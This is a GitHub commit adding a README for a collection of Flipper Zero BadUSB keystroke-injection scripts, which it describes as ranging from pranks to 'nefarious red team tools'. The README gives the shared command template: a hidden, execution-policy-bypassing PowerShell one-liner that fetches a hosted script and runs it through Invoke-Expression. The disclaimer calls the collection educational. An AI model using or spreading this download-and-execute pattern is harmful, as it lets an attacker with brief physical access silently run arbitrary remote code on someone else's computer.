Add files via upload

This commit is contained in:
beigeworm
2023-07-17 15:43:57 +00:00
committed by GitHub
parent 74b4b2e581
commit 4649c960e1
27 changed files with 537 additions and 0 deletions

View File

@@ -0,0 +1,20 @@
# Downloadable-Ducky-Scripts-For-FlipperZero
**These scripts download scripts to run from this repo -**
https://github.com/beigeworm/assets/tree/main/Scripts
they all use this command > `powershell -NoP -Ep Bypass -W H -C $variable='USER_INPUT_HERE'; irm HOSTED_SCRIPT_URL_HERE | iex`
These scripts range from harmless pranks to nefarious red team tools. For educational purposes only!
**If you want to learn more about the code, or modify them, most of these scripts are in powershell format here**
https://github.com/beigeworm/Powershell-Tools-and-Toys
# Pre-Deployment Setup
Most of these scripts will require some setup before they will work.
# If you like my work please leave a star. ⭐